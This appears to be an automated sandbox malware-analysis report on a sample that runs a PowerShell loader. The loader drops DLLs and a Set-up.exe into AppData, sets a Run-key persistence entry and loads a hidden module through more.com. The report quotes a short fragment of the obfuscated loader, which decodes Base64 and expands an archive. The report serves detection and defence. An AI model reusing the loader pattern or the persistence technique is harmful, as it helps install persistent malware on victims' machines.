Source:	Binary string: msvcr100.i386.pdb source: Set-up.exe
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602380000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C78000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216021A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602171000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: more.com, 00000006.00000002.2011662498.0000000004B19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600A0A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: more.com, 00000006.00000002.2011662498.0000000004B19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216029A9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160205B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wlanutil.pdb source: msiexec.exe
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600B15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B44000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($WNwLoBxi) [System.IO.File]::WriteAllBytes($pZFFDumV, $RPzWKgrV) $AWxBKZzC = New-Item -ItemType Directory -Path $CTjptNkO try { $PVoStvRD = Expand-Archive -Path $pZFFD

Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr

Static PE information: 0x775CB74C [Thu Jun 16 20:02:20 2033 UTC]

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Code function: 9_2_6BBBB5A7 _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

9_2_6BBBB5A7

Source: QtCore4.dll.5.dr	Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: exdefo.6.dr	Static PE information: real checksum: 0x0 should be: 0x521b9
Source: StarBurn.dll.5.dr	Static PE information: real checksum: 0xa4afa should be: 0xa8af0
Source: QtCore4.dll.0.dr	Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: StarBurn.dll.0.dr	Static PE information: real checksum: 0xa4afa should be: 0xa8af0

Source: tradingnetworkingsockets.dll.0.dr	Static PE information: section name: _RDATA
Source: nvdisps.dll.0.dr	Static PE information: section name: .didat
Source: opengl64.dll.0.dr	Static PE information: section name: .uedbg
Source: opengl64.dll.0.dr	Static PE information: section name: _RDATA
Source: exdefo.6.dr	Static PE information: section name: fboy

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB4B658 push ecx; ret	9_2_6BB4B66B
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB32D88 push eax; ret	9_2_6BB32DA6
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB40CC5 push ecx; ret	9_2_6BB40CD8

Source: StarBurn.dll.0.dr	Static PE information: section name: .text entropy: 6.933800138980239
Source: msvcr100.dll.0.dr	Static PE information: section name: .text entropy: 6.9169969425576285
Source: msvcr100.dll.5.dr	Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.5.dr	Static PE information: section name: .text entropy: 6.933800138980239

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdisps.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	File created: C:\Users\user\AppData\Roaming\fmitor\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	File created: C:\Users\user\AppData\Roaming\fmitor\msvcp100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	File created: C:\Users\user\AppData\Roaming\fmitor\StarBurn.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtXml4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\msvcp100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtGui4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\AdTree.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvptxJitCompiler32.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtCore4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	File created: C:\Users\user\AppData\Roaming\fmitor\QtXml4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\StarBurn.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	File created: C:\Users\user\AppData\Roaming\fmitor\QtGui4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	File created: C:\Users\user\AppData\Roaming\fmitor\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\exdefo	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	File created: C:\Users\user\AppData\Roaming\fmitor\QtCore4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdispsr.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x64\trading_api64.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\AbRoot.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\opengl64.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x64\tradingnetworkingsockets.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\more.com

File created: C:\Users\user\AppData\Local\Temp\exdefo

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\more.com

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EXDEFO

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Code function: 9_2_6BB8A3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,

9_2_6BB8A3DD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
